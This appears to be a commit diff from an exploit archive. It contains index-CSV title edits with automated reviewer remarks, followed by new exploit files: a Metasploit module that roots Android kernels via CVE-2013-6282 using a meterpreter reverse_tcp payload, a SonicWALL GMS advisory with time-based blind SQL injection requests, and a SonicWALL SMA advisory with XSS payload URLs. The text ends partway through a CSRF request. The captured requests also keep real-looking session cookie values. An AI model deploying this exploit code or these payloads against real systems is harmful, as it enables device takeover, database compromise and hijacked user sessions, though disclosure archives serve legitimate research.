25536,platforms/asp/webapps/25536.txt,"MetaCart E-Shop V-8 - IntProdID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0 25536,platforms/asp/webapps/25536.txt,"MetaCart E-Shop V-8 - IntProdID Parameter SQL Injection",2005-04-26,Dcrab,asp,webapps,0
@ -28980,9 +28981,9 @@ id,file,description,date,author,platform,type,port
27364,platforms/php/webapps/27364.txt,"Game-Panel 2.6 - 'login.php' Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 27364,platforms/php/webapps/27364.txt,"Game-Panel 2.6 - 'login.php' Cross-Site Scripting",2006-03-06,Retard,php,webapps,0
27557,platforms/php/webapps/27557.pl,"PHPSelect Submit-A-Link - HTML Injection",2006-04-01,s3rv3r_hack3r,php,webapps,0 27557,platforms/php/webapps/27557.pl,"PHPSelect Submit-A-Link - HTML Injection",2006-04-01,s3rv3r_hack3r,php,webapps,0
27367,platforms/php/webapps/27367.txt,"Link Bank - Iframe.php Cross-Site Scripting",2006-03-07,Retard,php,webapps,0 27367,platforms/php/webapps/27367.txt,"Link Bank - Iframe.php Cross-Site Scripting",2006-03-07,Retard,php,webapps,0
27368,platforms/php/webapps/27368.txt,"LoudBlog 0.41 - podcast.php id Parameter SQL Injection",2006-03-07,tzitaroth,php,webapps,0 27368,platforms/php/webapps/27368.txt,"LoudBlog 0.41 - 'podcast.php' SQL Injection",2006-03-07,tzitaroth,php,webapps,0
27369,platforms/php/webapps/27369.txt,"LoudBlog 0.41 - 'index.php' template Parameter Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0 27369,platforms/php/webapps/27369.txt,"LoudBlog 0.41 - 'index.php' template Parameter Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0
27370,platforms/php/webapps/27370.txt,"LoudBlog 0.41 - backend_settings.php language Parameter Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0 27370,platforms/php/webapps/27370.txt,"LoudBlog 0.41 - 'backend_settings.php' Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0
27371,platforms/php/webapps/27371.txt,"HitHost 1.0 - deleteuser.php user Parameter Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 27371,platforms/php/webapps/27371.txt,"HitHost 1.0 - deleteuser.php user Parameter Cross-Site Scripting",2006-03-06,Retard,php,webapps,0
27372,platforms/php/webapps/27372.txt,"HitHost 1.0 - viewuser.php hits Parameter Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 27372,platforms/php/webapps/27372.txt,"HitHost 1.0 - viewuser.php hits Parameter Cross-Site Scripting",2006-03-06,Retard,php,webapps,0
27373,platforms/php/webapps/27373.txt,"TextFileBB 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-08,Retard,php,webapps,0 27373,platforms/php/webapps/27373.txt,"TextFileBB 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-08,Retard,php,webapps,0
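Review bot: Rows 27368 and 27370 drop the parameter names ("id" and "language") from their titles, while row 27369 between them keeps "template Parameter". That is information loss rather than formatting: the parameter is what a defender greps logs or WAF rules for. Keep it in the new quoting style, for example "LoudBlog 0.41 - 'podcast.php' 'id' Parameter SQL Injection", or explain in the commit message why these two rows are treated differently from 27369.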
@ -29309,7 +29310,7 @@ id,file,description,date,author,platform,type,port
27800,platforms/php/webapps/27800.txt,"Pinnacle Cart 3.3 - 'index.php' Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 27800,platforms/php/webapps/27800.txt,"Pinnacle Cart 3.3 - 'index.php' Cross-Site Scripting",2006-05-02,r0t,php,webapps,0
27803,platforms/php/webapps/27803.txt,"321soft PHP-Gallery 0.9 - 'index.php' path Variable Arbitrary Directory Listing",2006-05-03,d4igoro,php,webapps,0 27803,platforms/php/webapps/27803.txt,"321soft PHP-Gallery 0.9 - 'index.php' path Variable Arbitrary Directory Listing",2006-05-03,d4igoro,php,webapps,0
27804,platforms/php/webapps/27804.txt,"321soft PHP-Gallery 0.9 - 'index.php' path Parameter Cross-Site Scripting",2006-05-03,d4igoro,php,webapps,0 27804,platforms/php/webapps/27804.txt,"321soft PHP-Gallery 0.9 - 'index.php' path Parameter Cross-Site Scripting",2006-05-03,d4igoro,php,webapps,0
27807,platforms/php/webapps/27807.txt,"Fast Click SQL Lite 1.1.2/1.1.3 - show.php Remote File Inclusion",2006-05-03,R@1D3N,php,webapps,0 27807,platforms/php/webapps/27807.txt,"Fast Click SQL Lite 1.1.2/1.1.3 - 'show.php' Remote File Inclusion",2006-05-03,R@1D3N,php,webapps,0
27808,platforms/php/webapps/27808.txt,"Pacheckbook 1.1 - 'index.php' Multiple SQL Injection",2006-05-03,almaster,php,webapps,0 27808,platforms/php/webapps/27808.txt,"Pacheckbook 1.1 - 'index.php' Multiple SQL Injection",2006-05-03,almaster,php,webapps,0
27809,platforms/php/webapps/27809.txt,"MyNews 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,DreamLord,php,webapps,0 27809,platforms/php/webapps/27809.txt,"MyNews 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,DreamLord,php,webapps,0
27810,platforms/php/webapps/27810.txt,"Albinator 2.0.8 - dlisting.php cid Parameter Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 27810,platforms/php/webapps/27810.txt,"Albinator 2.0.8 - dlisting.php cid Parameter Cross-Site Scripting",2006-05-02,r0t,php,webapps,0
@ -29639,7 +29640,7 @@ id,file,description,date,author,platform,type,port
28308,platforms/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 - members.php cfg_root Parameter Remote File Inclusion",2006-07-31,SirDarckCat,php,webapps,0 28308,platforms/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 - members.php cfg_root Parameter Remote File Inclusion",2006-07-31,SirDarckCat,php,webapps,0
28309,platforms/php/webapps/28309.txt,"Seir Anphin V666 Community Management System - Multiple SQL Injections",2006-07-31,CR,php,webapps,0 28309,platforms/php/webapps/28309.txt,"Seir Anphin V666 Community Management System - Multiple SQL Injections",2006-07-31,CR,php,webapps,0
28310,platforms/php/webapps/28310.txt,"Moskool 1.5 Component - Admin.Moskool.php Remote File Inclusion",2006-07-31,saudi.unix,php,webapps,0 28310,platforms/php/webapps/28310.txt,"Moskool 1.5 Component - Admin.Moskool.php Remote File Inclusion",2006-07-31,saudi.unix,php,webapps,0
28311,platforms/php/webapps/28311.txt,"myEvent 1.2/1.3 - Myevent.php Remote File Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0 28311,platforms/php/webapps/28311.txt,"myEvent 1.2/1.3 - 'myevent.php' Remote File Inclusion",2006-07-31,CeNGiZ-HaN,php,webapps,0
28315,platforms/php/webapps/28315.txt,"Help Center Live 2.1.2 - module.php Directory Traversal",2006-07-31,Dr.GooGle,php,webapps,0 28315,platforms/php/webapps/28315.txt,"Help Center Live 2.1.2 - module.php Directory Traversal",2006-07-31,Dr.GooGle,php,webapps,0
28316,platforms/php/webapps/28316.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (2)",2006-07-31,SirDarckCat,php,webapps,0 28316,platforms/php/webapps/28316.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (2)",2006-07-31,SirDarckCat,php,webapps,0
28317,platforms/php/webapps/28317.txt,"WoW Roster 1.5 - hsList.php subdir Parameter Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0 28317,platforms/php/webapps/28317.txt,"WoW Roster 1.5 - hsList.php subdir Parameter Remote File Inclusion",2006-08-01,skulmatic,php,webapps,0
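Review bot: Row 28311 changes the case of the file name as well as its quoting ("Myevent.php" becomes "'myevent.php'"), and on a case-sensitive filesystem those are two different paths. Check the spelling against 28311.txt and, if the advisory uses the capitalised form, keep it as 'Myevent.php'.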
@ -32192,12 +32193,12 @@ id,file,description,date,author,platform,type,port
32141,platforms/php/webapps/32141.txt,"Homes 4 Sale - 'results.php' Cross-Site Scripting",2008-08-04,"Ghost Hacker",php,webapps,0 32141,platforms/php/webapps/32141.txt,"Homes 4 Sale - 'results.php' Cross-Site Scripting",2008-08-04,"Ghost Hacker",php,webapps,0
32142,platforms/php/webapps/32142.php,"Pligg 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass",2008-08-02,"Micheal Brooks",php,webapps,0 32142,platforms/php/webapps/32142.php,"Pligg 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass",2008-08-02,"Micheal Brooks",php,webapps,0
32143,platforms/php/webapps/32143.txt,"Keld PHP-MySQL News Script 0.7.1 - 'login.php' SQL Injection",2008-08-04,crimsoN_Loyd9,php,webapps,0 32143,platforms/php/webapps/32143.txt,"Keld PHP-MySQL News Script 0.7.1 - 'login.php' SQL Injection",2008-08-04,crimsoN_Loyd9,php,webapps,0
32144,platforms/php/webapps/32144.txt,"Meeting Room Booking System (MRBS) 1.2.6 - day.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 32144,platforms/php/webapps/32144.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'day.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
32145,platforms/php/webapps/32145.txt,"Meeting Room Booking System (MRBS) 1.2.6 - week.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 32145,platforms/php/webapps/32145.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'week.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
32146,platforms/php/webapps/32146.txt,"Meeting Room Booking System (MRBS) 1.2.6 - month.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 32146,platforms/php/webapps/32146.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'month.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
32147,platforms/php/webapps/32147.txt,"Meeting Room Booking System (MRBS) 1.2.6 - search.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 32147,platforms/php/webapps/32147.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'search.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
32148,platforms/php/webapps/32148.txt,"Meeting Room Booking System (MRBS) 1.2.6 - report.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 32148,platforms/php/webapps/32148.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'report.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
32149,platforms/php/webapps/32149.txt,"Meeting Room Booking System (MRBS) 1.2.6 - help.php area Parameter Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 32149,platforms/php/webapps/32149.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'help.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0
32150,platforms/php/webapps/32150.txt,"UNAK-CMS 1.5 - 'connector.php' Local File Inclusion",2008-08-04,"Sina Yazdanmehr",php,webapps,0 32150,platforms/php/webapps/32150.txt,"UNAK-CMS 1.5 - 'connector.php' Local File Inclusion",2008-08-04,"Sina Yazdanmehr",php,webapps,0
32151,platforms/asp/webapps/32151.pl,"Pcshey Portal - 'kategori.asp' SQL Injection",2008-08-04,U238,asp,webapps,0 32151,platforms/asp/webapps/32151.pl,"Pcshey Portal - 'kategori.asp' SQL Injection",2008-08-04,U238,asp,webapps,0
32157,platforms/asp/webapps/32157.txt,"Kentico CMS 7.0.75 - User Information Disclosure",2014-03-10,"Charlie Campbell and Lyndon Mendoza",asp,webapps,80 32157,platforms/asp/webapps/32157.txt,"Kentico CMS 7.0.75 - User Information Disclosure",2014-03-10,"Charlie Campbell and Lyndon Mendoza",asp,webapps,80
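Review bot: Rows 32144 to 32149 all lose "area Parameter", so after this change nobody searching the index for the affected parameter will find any of the six MRBS entries. The file name alone now distinguishes them, which is fine, but the shared parameter should stay in each title in the quoted form used elsewhere in this commit.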
@ -32489,8 +32490,8 @@ id,file,description,date,author,platform,type,port
32636,platforms/php/webapps/32636.txt,"Orkut Clone - profile_social.php id Parameter SQL Injection",2008-12-02,d3b4g,php,webapps,0 32636,platforms/php/webapps/32636.txt,"Orkut Clone - profile_social.php id Parameter SQL Injection",2008-12-02,d3b4g,php,webapps,0
32637,platforms/php/webapps/32637.txt,"Orkut Clone - profile_social.php id Parameter Cross-Site Scripting",2008-12-02,d3b4g,php,webapps,0 32637,platforms/php/webapps/32637.txt,"Orkut Clone - profile_social.php id Parameter Cross-Site Scripting",2008-12-02,d3b4g,php,webapps,0
32638,platforms/php/webapps/32638.txt,"Horde Webmail 5.1 - Open Redirect",2014-04-01,"felipe andrian",php,webapps,0 32638,platforms/php/webapps/32638.txt,"Horde Webmail 5.1 - Open Redirect",2014-04-01,"felipe andrian",php,webapps,0
32639,platforms/php/webapps/32639.txt,"yappa-ng - 'index.php' album Parameter Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps,0 32639,platforms/php/webapps/32639.txt,"Yappa-ng - 'index.php' album Parameter Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps,0
32640,platforms/php/webapps/32640.txt,"yappa-ng - Query String Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps,0 32640,platforms/php/webapps/32640.txt,"Yappa-ng - Query String Cross-Site Scripting",2008-12-03,Pouya_Server,php,webapps,0
32641,platforms/php/webapps/32641.txt,"RevSense 1.0 - SQL Injection / Cross-Site Scripting",2008-12-04,Pouya_Server,php,webapps,0 32641,platforms/php/webapps/32641.txt,"RevSense 1.0 - SQL Injection / Cross-Site Scripting",2008-12-04,Pouya_Server,php,webapps,0
32642,platforms/php/webapps/32642.txt,"PHPSTREET WebBoard 1.0 - 'show.php' SQL Injection",2008-12-04,"CWH Underground",php,webapps,0 32642,platforms/php/webapps/32642.txt,"PHPSTREET WebBoard 1.0 - 'show.php' SQL Injection",2008-12-04,"CWH Underground",php,webapps,0
32644,platforms/php/webapps/32644.txt,"Alienvault 4.5.0 - Authenticated SQL Injection (Metasploit)",2014-04-01,"Brandon Perry",php,webapps,443 32644,platforms/php/webapps/32644.txt,"Alienvault 4.5.0 - Authenticated SQL Injection (Metasploit)",2014-04-01,"Brandon Perry",php,webapps,443
@ -35809,12 +35810,10 @@ id,file,description,date,author,platform,type,port
38178,platforms/php/webapps/38178.txt,"WordPress Plugin NextGEN Gallery - 'test-head' Parameter Cross-Site Scripting",2013-01-08,Am!r,php,webapps,0 38178,platforms/php/webapps/38178.txt,"WordPress Plugin NextGEN Gallery - 'test-head' Parameter Cross-Site Scripting",2013-01-08,Am!r,php,webapps,0
38173,platforms/multiple/webapps/38173.txt,"ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Execution",2015-09-14,xistence,multiple,webapps,0 38173,platforms/multiple/webapps/38173.txt,"ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Execution",2015-09-14,xistence,multiple,webapps,0
38174,platforms/multiple/webapps/38174.txt,"ManageEngine OpManager 11.5 - Multiple Vulnerabilities",2015-09-14,xistence,multiple,webapps,0 38174,platforms/multiple/webapps/38174.txt,"ManageEngine OpManager 11.5 - Multiple Vulnerabilities",2015-09-14,xistence,multiple,webapps,0
38180,platforms/php/webapps/38180.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0
38176,platforms/php/webapps/38176.txt,"WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",php,webapps,0 38176,platforms/php/webapps/38176.txt,"WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",php,webapps,0
38181,platforms/php/webapps/38181.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/upload.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0 38182,platforms/php/webapps/38182.txt,"tinybrowser - 'type' Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0
38182,platforms/php/webapps/38182.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0 38183,platforms/php/webapps/38183.txt,"tinybrowser - 'tinybrowser.php' Directory Listing",2013-01-09,MustLive,php,webapps,0
38183,platforms/php/webapps/38183.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0 38184,platforms/php/webapps/38184.txt,"tinybrowser - 'edit.php' Directory Listing",2013-01-09,MustLive,php,webapps,0
38184,platforms/php/webapps/38184.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0
38187,platforms/php/webapps/38187.txt,"WordPress Plugin CP Reservation Calendar 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",php,webapps,80 38187,platforms/php/webapps/38187.txt,"WordPress Plugin CP Reservation Calendar 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",php,webapps,80
38188,platforms/jsp/webapps/38188.txt,"Openfire 3.10.2 - Unrestricted Arbitrary File Upload",2015-09-15,hyp3rlinx,jsp,webapps,80 38188,platforms/jsp/webapps/38188.txt,"Openfire 3.10.2 - Unrestricted Arbitrary File Upload",2015-09-15,hyp3rlinx,jsp,webapps,80
38189,platforms/jsp/webapps/38189.txt,"Openfire 3.10.2 - Remote File Inclusion",2015-09-15,hyp3rlinx,jsp,webapps,0 38189,platforms/jsp/webapps/38189.txt,"Openfire 3.10.2 - Remote File Inclusion",2015-09-15,hyp3rlinx,jsp,webapps,0
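Review bot: the retitled row for 38182 ("tinybrowser - 'type' Parameter Cross-Site Scripting") no longer names a script, while the rows for 38180 (edit.php) and 38181 (upload.php) are dropped in the same hunk, so a search for either script name stops matching any XSS row. Keep the affected scripts in the description, for example by listing edit.php, upload.php and tinybrowser.php in the 38182 title, the way the new 38183 and 38184 titles still name their scripts.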
@ -36926,3 +36925,8 @@ id,file,description,date,author,platform,type,port
40969,platforms/php/webapps/40969.pl,"PHPMailer < 5.2.20 - Remote Code Execution",2016-12-27,"Dawid Golunski",php,webapps,0 40969,platforms/php/webapps/40969.pl,"PHPMailer < 5.2.20 - Remote Code Execution",2016-12-27,"Dawid Golunski",php,webapps,0
40971,platforms/php/webapps/40971.txt,"WordPress Plugin Simply Poll 1.4.1 - SQL Injection",2016-12-28,"TAD GROUP",php,webapps,0 40971,platforms/php/webapps/40971.txt,"WordPress Plugin Simply Poll 1.4.1 - SQL Injection",2016-12-28,"TAD GROUP",php,webapps,0
40972,platforms/php/webapps/40972.php,"SwiftMailer < 5.4.5-DEV - Remote Code Execution",2016-12-28,"Dawid Golunski",php,webapps,0 40972,platforms/php/webapps/40972.php,"SwiftMailer < 5.4.5-DEV - Remote Code Execution",2016-12-28,"Dawid Golunski",php,webapps,0
40973,platforms/php/webapps/40973.txt,"Joomla! Component aWeb Cart Watching System for Virtuemart 2.6.0 - SQL Injection",2016-12-28,qemm,php,webapps,0
40974,platforms/php/webapps/40974.py,"PHPMailer < 5.2.18 - Remote Code Execution (Python)",2016-12-29,anarc0der,php,webapps,0
40976,platforms/php/webapps/40976.txt,"WordPress Plugin Slider Templatic Tevolution < 2.3.6 - Arbitrary File Upload",2016-12-29,r3m1ck,php,webapps,0
40977,platforms/hardware/webapps/40977.txt,"Dell SonicWALL Global Management System GMS 8.1 - Blind SQL Injection",2016-12-29,LiquidWorm,hardware,webapps,0
40978,platforms/hardware/webapps/40978.txt,"Dell SonicWALL Secure Mobile Access SMA 8.1 - Cross-Site Scripting / Cross-Site Request Forgery",2016-12-29,LiquidWorm,hardware,webapps,0
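Review bot: the new row for 40976 gives the affected range as "< 2.3.6", but the header of 40976.txt added in this commit says "<= 2.3.6", so the index excludes the one version the file names. The 40973 row drifts the same way ("2.6.0" against "<= 2.6.0" in its file). Align the CSV titles with the file headers, or correct the files if the strict bound is what is meant.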


@ -0,0 +1,81 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Common
def initialize(info={})
super( update_info( info, {
'Name' => "Android get_user/put_user Exploit",
'Description' => %q{
This module exploits a missing check in the get_user and put_user API functions
in the linux kernel before 3.5.5. The missing checks on these functions
allow an unprivileged user to read and write kernel memory.
This exploit first reads the kernel memory to identify the commit_creds and
ptmx_fops address, then uses the write primitive to execute shellcode as uid 0.
The exploit was first discovered in the wild in the vroot rooting application.
},
'License' => MSF_LICENSE,
'Author' => [
'fi01', # libget_user_exploit / libput_user_exploit
'cubeundcube', # kallsyms_in_memory
'timwr', # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-6282' ],
[ 'URL', 'http://forum.xda-developers.com/showthread.php?t=2434453' ],
[ 'URL', 'https://github.com/fi01/libget_user_exploit' ],
[ 'URL', 'http://forum.xda-developers.com/showthread.php?t=2565758' ],
],
'DisclosureDate' => "Sep 06 2013",
'SessionTypes' => [ 'meterpreter' ],
"Platform" => [ "android", "linux" ],
'Targets' => [[ 'Automatic', { }]],
'Payload' => { 'Space' => 2048, },
'DefaultOptions' =>
{
'WfsDelay' => 120,
'PAYLOAD' => 'linux/armle/mettle/reverse_tcp',
},
'DefaultTarget' => 0,
}
))
end
def exploit
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2013-6282.so" )
exploit_data = File.read(local_file, {:mode => 'rb'})
space = payload_space
payload_encoded = payload.encoded
# Substitute the exploit shellcode with our own
exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))
workingdir = session.fs.dir.getwd
remote_file = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"
write_file(remote_file, exploit_data)
print_status("Loading exploit library #{remote_file}")
session.core.load_library(
'LibraryFilePath' => local_file,
'TargetFilePath' => remote_file,
'UploadLibrary' => false,
'Extension' => false,
'SaveToDisk' => false
)
print_status("Loaded library #{remote_file}, deleting")
session.fs.file.rm(remote_file)
print_status("Waiting #{datastore['WfsDelay']} seconds for payload")
end
end
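Review bot: the module defines no `check` method and offers only an 'Automatic' target, so `exploit` proceeds on any meterpreter session even though the description limits the flaw to kernels before 3.5.5. Add a `check` that reads the session's kernel version and returns CheckCode::Safe for 3.5.5 and later, and have `exploit` stop when it does, so the module is not run against devices the description itself rules out.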


@ -0,0 +1,112 @@

Dell SonicWALL Global Management System GMS 8.1 Blind SQL Injection
Vendor: Dell Inc.
Product web page: https://www.sonicwall.com/products/sonicwall-gms/
Affected version: 8.1
8.0 SP1 Build 8048.1410
Flow Server Virtual Appliance
Fixed in: 8.2 (VR-2016-01-C0V)
Summary: Provide your organization, distributed enterprise or managed
service offering with an intuitive, powerful way to rapidly deploy and
centrally manage SonicWall solutions, with SonicWall GMS. Get more value
from your firewall, secure remote access, anti-spam, and backup and recovery
solutions with enhanced network security monitoring and robust network
security reporting. By deploying GMS in an enterprise, you can minimize
administrative overhead by streamlining security appliance deployment
and policy management.
Desc: Dell SonicWALL GMS suffers from multiple SQL Injection vulnerabilities.
Input passed via the GET parameters 'searchBySonicwall', 'firstChangeOrderID',
'secondChangeOrderID' and 'coDomainID' is not properly sanitised before being
returned to the user or used in SQL queries. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.
Tested on: SonicWALL
MySQL/5.0.96-community-nt
Apache-Coyote/1.1
Apache Tomcat 6.0.41
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5388
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5388.php
Vendor: https://support.sonicwall.com/product-notification/215257?productName=SonicWALL%20GMS
26.01.2016
--
Blind SQL Injection via several parameters:
- searchBySonicwall (GET)
- coDomainID (GET)
- firstChangeOrderID (GET)
- secondChangeOrderID (GET)
PoC:
#1
GET /sgms/TaskViewServlet?page=taskView&level=1&node_id=null&screenid=15200&unused=&help_url=&node_name=null&unitType=0&searchBySonicwall=null'%2b(select*from(select(sleep(6)))a)%2b' HTTP/1.1
Host: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Referer: http://127.0.0.1/sgms/content.jsp
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3
Connection: close
#2
GET /sgms/Logs?page=logView&searchByCO=Workflow%20Change%20Order%20Example&coDomainID=DMN0000000000000000000000001'%2b(select*from(select(sleep(6)))a)%2b'&level=1&node_id=null&screenid=15150&unused=&help_url=&node_name=null&unitType=0&searchBySonicwall=null HTTP/1.1
Host: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Referer: http://127.0.0.1/sgms/content.jsp
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3
Connection: close
#3
GET /sgms/workflow?page=fetchCompareScreens&firstChangeOrderID=CHO14532479280350040102377D2'%2b(select*from(select(sleep(6)))a)%2b'&secondChangeOrderID=CHO14520472477130040102377D2&_dc=1453805798333&node=root HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept: */*
Referer: http://127.0.0.1/sgms/viewdiff.jsp
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3
Connection: close
#4
GET /sgms/workflow?page=fetchCompareScreens&firstChangeOrderID=CHO14532479280350040102377D2&secondChangeOrderID=CHO14520472477130040102377D2'%2b(select*from(select(sleep(6)))a)%2b'&_dc=1453805798333&node=root HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept: */*
Referer: http://127.0.0.1/sgms/viewdiff.jsp
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3
Connection: close
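Review bot: all four captured requests keep the full JSESSIONID and SSOSESSIONID cookie values from the test session, together with the exact browser User-Agent. Replace them with placeholders before the file is archived; nothing in the write-up depends on the real values. The bare "26.01.2016" line should also be labelled, since the index row for this file is dated 2016-12-29 and a reader cannot tell whether it is the discovery date or the vendor-report date.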


@ -0,0 +1,63 @@
Dell SonicWALL Secure Mobile Access SMA 8.1 XSS And WAF CSRF
Vendor: Dell Inc.
Product web page: https://www.sonicwall.com/products/secure-mobile-access/
Affected version: 8.1 (SSL-VPN)
Summary: Keep up with the demands of todays remote workforce. Enable secure
mobile access to critical apps and data without compromising security. Choose
from a variety of scalable secure mobile access (SMA) appliances and intuitive
Mobile Connect apps to fit every size business and budget.
Desc: SonicWALL SMA suffers from a XSS issue due to a failure to properly sanitize
user-supplied input to several parameters. Attackers can exploit this weakness
to execute arbitrary HTML and script code in a user's browser session. The WAF was
bypassed via form-based CSRF.
Tested on: SonicWALL SSL-VPN Web Server
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5392
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5392.php
Firmware fixed: 8.1.0.3
Issue ID: 172692
http://documents.software.dell.com/sonicwall-sma-100-series/8.1.0.3/release-notes/resolved-issues?ParentProduct=869
26.01.2016
--
Reflected XSS via protocol parameter (GET):
-------------------------------------------
https://127.0.0.1/cgi-bin/ftplauncher?protocol=sftp:</script><img%20src=a%20onerror=confirm(1)>&bmId=55
XSS via arbitrary parameter (GET):
----------------------------------
https://127.0.0.1/cgi-bin/handleWAFRedirect?hdl=VqjLncColvAAAF4QB2YAAAAT&<script>alert(2)</script>=zsl
XSS via REMOTEPATH parameter (GET):
-----------------------------------
https://127.0.0.1/cgi-bin/soniclauncher?REMOTEPATH=//servername/share/</script><img%20src=a%20onerror=confirm(3)>&bmId=59
WAF Cross-Site Request Forgery PoC:
-----------------------------------
POST /cgi-bin/editBookmark HTTP/1.1
Host: 127.0.0.1
